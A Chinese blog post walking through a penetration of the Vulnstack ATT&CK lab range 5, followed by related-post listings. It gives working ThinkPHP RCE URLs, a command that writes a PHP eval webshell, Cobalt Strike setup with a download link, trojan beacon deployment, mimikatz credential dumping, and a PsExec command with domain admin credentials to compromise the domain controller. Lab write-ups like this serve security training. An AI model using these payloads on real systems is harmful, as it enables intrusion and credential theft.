记一次内网渗透(ATT&CK第五个攻防靶场)

最新推荐文章于 2024-06-04 12:50:14 发布
最新推荐文章于 2024-06-04 12:50:14 发布
阅读量1.7k 收藏 11
点赞数 1
分类专栏: 内网渗透 靶场搭建 笔记 文章标签: windows 后端 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a168xzy/article/details/110958951
版权

记一次内网渗透(ATT&CK第五个攻防靶场)

靶场下载地址:download

渗透测试

DT4ZJH.png
拿到题目打开是一个thinkphp框架
测试thinkphp版本
DT4L6I.png
找到此版本漏洞的poc 可以命令执行

http://192.168.199.206/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

DT524g.png
查看当前路径

http://192.168.199.206/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=powershell%20pwd

DTICVK.png

写一句话木马getshell

http://192.168.199.206/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST['a']); ?^> > C:\phpStudy\PHPTutorial\WWW\public\shell.php

蚁剑连接
DTIWdK.png

当前权限是含有域环境的administrator权限
DT7AGF.png

内 网 渗 透

主机信息收集
arp -a

看一下 arp信息 发现 199段有一台ip200的机器
DT7bLR.png

ipconfig /all

看下ip,dns 为192.168.199.200 域名sun.com
DTH6fO.png

ping一下sun.com

DTHOXj.png
域控ip就是192.168.199.200

查看域用户

net user /domain

DTbU4f.png

内网横向移动

接下来攻击域控就用cs(cobalt strike)来完成

cobalt strike4.0中文版
网盘链接

https://pan.baidu.com/s/1iVzO47G-aGzFoa82Zdoobw

提取码:kxyz

因为win7这台靶机可以出网,win2008不可以
要让我们win7上线
首先搭建cs环境
使用kali作为服务端
本机win10作为客户端
1.将下载好的cs解压到两台机器

kali下:

进入cs文件下使用root权限

sudo su root

chmod 777 teamserver

修改teamserver文件权限
DTLxHA.png

vim teamserver

修改服务端端口
默认为(50050)
我这里修改为12345
DTOgUI.png

因为kali有防火墙
需要开放12345端口

sudo ufw allow 12345

DTjFmQ.png
现在启动服务端

./teamserver 192.168.199.207(kali的IP) 123456(cs服务密码后面连接需要用)

DTja6O.png
现在到本机打开客户端
DTjRc8.png
双击bat文件即可

DTvga9.png
打开就可以进行连接了
DTvf8x.png
成功连接!

创建监听器
D7pkid.png
生成windows exe木马
D7pwo4.png
D7pgOK.png
选择监听器
生成木马
利用蚁剑将木马程序上传到win7靶机
D79g9s.png
在终端运行木马程序
D7CBx1.png
cs中看到管理员已经上线
D7PWwT.png
运行mimikatz 读到了域管理员的密码
D7iLgs.png
提权
D7FHZ6.png
D7Fvzd.png
看到系统权限管理员已上线
扫一下内网可以用psexec登录的主机,基于ipc共享,要打开445端口才可以,所以扫一下445端口
(IPC共享:连接者可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表。)

(psexec:微软官方实用工具(如 Telnet)和远程控制程序(如 Symantec 的 PC Anywhere)使您可以在远程系统上执行程序,但安装它们非常困难,并且需要您在想要访问的远程系统上安装客户端软件。PsExec 是一个轻型的 telnet 替代工具,它使您无需手动安装客户端软件即可执行其他系统上的进程,并且可以获得与控制台应用程序相当的完全交互性。)

portscan 192.168.199.0/24 445 arp 50
portscan  网段 端口 协议(icmp arp none)线程

D7ZPXj.png
扫到了许多存活主机
192.168.199.200是目标DC
由于这里的DC主机是不能出网的 但是cs服务端又是架设在互联网的

这时候就要用已经上线主机做listener 来让DC主机上线
在win7上设置中转监听

D7eVrd.png
D7eJqs.png
我这里使用1596端口来监听
查看一下端口状态

shell netstat -ano |findstr 1596

D7m61S.png
再次生成木马程序
D7noVA.png
将psexec和木马程序上传至win7靶机
psexec工具下载链接:

https://download.sysinternals.com/files/PSTools.zip

D7nY40.png

由于win7开着防火墙,dc在连接1596端口时进不来
先手动添加防火墙规则

netsh advfirewall firewall add rule name=cs dir=in action=allow protocol=TCP localport=1596

D7ufJ0.png

shell C:\phpStudy\PHPTutorial\WWW\public\PsExec64.exe -accepteula \\192.168.199.200 -u sun\Administrator -p 123456789a. -d -c C:\phpStudy\PHPTutorial\WWW\public\win2008.exe

执行payload看到DC已经上线
D7MNCt.png
运行mimikatz,得到win2008中admin的密码
D7lBkj.png
接下来可以操作DC系统文件
上传文件
D7Bz1U.png
运行mimikatz,得到win2008中admin的密码
D7lBkj.png
接下来可以操作DC系统文件
上传文件
D7Bz1U.png

kxyzx
关注
  • 1
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
MS08067 “安全练兵场”战术空袭~
Ms08067安全实验室
10-18 2142
成立"安全练兵场"的目的目前,安全行业热度逐年增加,很多新手安全从业人员在获取技术知识时,会局限于少量的实战中,技术理解得不到升华,只会像个脚本小子照着代码敲命令,遇到实战时自乱阵脚,影响...
ATT&CK框架介绍及战技术对照表
05-18
ATT&CK(Adversarial Tactics, Techniques & Common Knowledge)是由MITRE公司开发的一个公开的知识库,旨在提供一个统一的视角来理解和防御网络攻击。该框架详细描述了攻击者在不同阶段可能使用的战术、技术和程序...
内网渗透靶场 Vulnstack(一)
qq_47168481的博客
10-06 5387
虽然网上说这个靶场不是很难,但我自己做起来还是困难重重,很多知识不了解,搞了好几天,学到了不少,继续努力!!! 域是计算机网络的一种形式,其中所有用户帐户 ,计算机,打印机和其他安全主体都在位于称为域控制器的一个或多个中央计算机集群上的中央数据库中注册。 身份验证在域控制器上进行。 在域中使用计算机的每个人都会收到一个唯一的用户帐户,然后可以为该帐户分配对该域内资源的访问权限。 从 Windows Server 2003 开始 , Active Directory 是负责维护该中央数据库的 Windows
【内网攻防实战】红日靶场01(超超超超超超详细!!实操+AI问答,胎教级教程)
最新发布
weixin_46022776的博客
06-04 3666
问题:解决:日志功能未开启,OFF,执行sql开启ON。
一次内网靶场渗透测试
m0_60571990的博客
10-13 1224
一次内网靶场渗透测试
内网渗透-ATT&CK第五个攻防靶场环境搭建
a168xzy的博客
12-10 2086
内网渗透-ATT&CK第五个攻防靶场环境搭建 靶场下载地址:download 下载靶场,用vm打开win7和win2008的vmx镜像 打开后到vm中找到编辑,打开网络编辑器,点击更改设置 添加两个网卡 一个使用桥接模式,网卡选择物理机在使用的网卡 另一个使用NAT模式,子网ip使用系统默认 接下来给两个靶机添加网卡 win7一个添加桥接一个添加NAT win2008添加NAT就可以了 ](https://imgchr.com/i/DTdvPU) win2008网络配置 win7网
完全模拟ATT&CK实战靶场之五
tangshuangsss的专栏
04-16 408
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本...
ATT&CK中文手册.zip
11-24
一、Initial Access(入口点) 二、Execution(命令执行) 三、Persistence(持久化) 四、Privilege Escalation(权限提升) 五、Defense Evasion(绕过防御) 六、Credential Access(获取凭证) 七、Discovery(基础信息收集) ...
ATT&CK手册(修改版)
09-16
5. **案例分析**:为了加深理解,手册可能会包含真实世界的攻击案例,展示攻击者如何运用ATT&CK框架中的战术和技术。 6. **防御策略**:除了描述攻击,手册还会提供防御建议,帮助组织识别和阻止这些攻击行为,包括...
ATT&CK 知识库(企业)中文版1
08-03
**ATT&CK 知识库(企业)中文版1** **初始访问** 初始访问是攻击者进入目标网络或系统的最初步骤,通常涉及多种技术来获取对目标环境的立足点。以下是一些主要的初始访问方法: 1. **路过式下载**:攻击者利用...
【网络安全】DVWA靶场实战&BurpSuite内网渗透
九芒星的博客
07-22 4848
借助DVWA靶场,对用户登录进行渗透测试
vulnstack内网渗透环境靶场-1 大全
鸣蜩十四的博客
08-19 2960
一.搭建vulnstack靶场环境 主要以真实企业环境为实例搭建一系列靶场,通过练习另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环,下载地址: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 这次靶场一共三个环境,win7,win2003,win2008,win7是web服务器,上面我们需要两张网卡,一张nat模式,一张主机模式,win2003是域成员,win2008为域控 Win7配置如下: 在win7中使用phpstudy开
内网域渗透总结(红日靶场一)
未完成的歌~的博客
04-11 6144
使用 smb beacon,由一台已经拿到 beacon 的机器,抓取密码后进行smb喷射,得到另一台开放445端口的机器上的administrator账户密码,在目标机器不出网的情况下,可以使用smb beacon使目标主机上线。发现也存在漏洞,同样先使用 use exploit/windows/smb/ms17_010_eternalblue 模块利用,但还是利用不了,猜测可能是防火墙的问题,因为这个系统是64位的。防火墙已经关掉了,再来试试 ms17_010_eternalblue,然而还是不行。
Vulnstack红日安全内网域渗透靶场1实战
热门推荐
道阻且长,行则将至。
07-14 1万+
文章目录前言靶场搭建外网打点MySQL写日志GetshellCMS后台上传GetShell内网渗透靶机CS后门上线内网域信息的收集 前言 VulnStack 是由红日安全团队倾力打造一个靶场知识平台。为了进一步学习内网渗透,本文将学习并录红日安全团队提供的一个内网域环境靶场的渗透过程。 靶场搭建 在线 靶场链接 如下: 1、下载后为 3 个虚拟机,网络拓扑如下: 2、从网络拓扑图得知,需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,故需要配置两个网络适配器(网卡),点击
CH4INRULZ_v1.0.1内网渗透靶场
weixin_51339377的博客
03-17 462
nmap -T4 -A -p- 192.168.206.146 这里我们借助工具dirsearch对该网站进行目录扫描 http://192.168.206.146/development/ 然后再通过御剑进行扫描 http://192.168.206.146/index.html.bak frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0 通过工具john进行一下解密 把解密结果存储到相应文件中 cd ...
ATT&CK靶场系列(五)
qq_1873822的博客
12-05 3318
一、环境配置 vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/7/ 虚拟机密码 win7 sun\heart 123.com sun\Administrator dc123.com Win7双网卡模拟内外网 2008 sun\admin 2020.com 网络环境配置如下: 二、前期信息收集 使用nmap对外网ip段进行信息收集 nmap -A -v -T4 192.168.135.15
ATT&CK实战:红日靶场
学生
06-19 532
已完成 0/9 [-] mysql 192.168.138.130:3306 root 123456 Error 1130: Host 'win7.sun.com' is not allowed to connect to this MySQL server。存在域 sun.com 域控 192.168.138.120 Windows Server 2008 HPC Edition 7600。上传frp 搭建socks隧道。开启win7远程桌面 并连接。获取域内所有用户的hash。连接win7远程桌面。
简单的内网渗透靶场实战(tp漏洞、msf、psexec横向渗透、权限维持)
weixin_41489908的博客
07-30 2854
​ 前言环境搭建web服务器渗透nmap探测端口thinkphp getshellthinkphp批量检测内网信息搜集内网渗透上线msf信息搜集获取凭证思路内网横向移动MS17-010尝试psexec尝试ipc连接关闭域控防火墙psexec尝试*2登录远程桌面权限维持DSRM后门日志清除 1 前言 在内网渗透的过程中思路才是最重要的,本次内网渗透的主机虽然不多,主要还是锻炼自己内网渗透的一个思想。 2环境搭建 靶场: win7(内):192.168.138...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值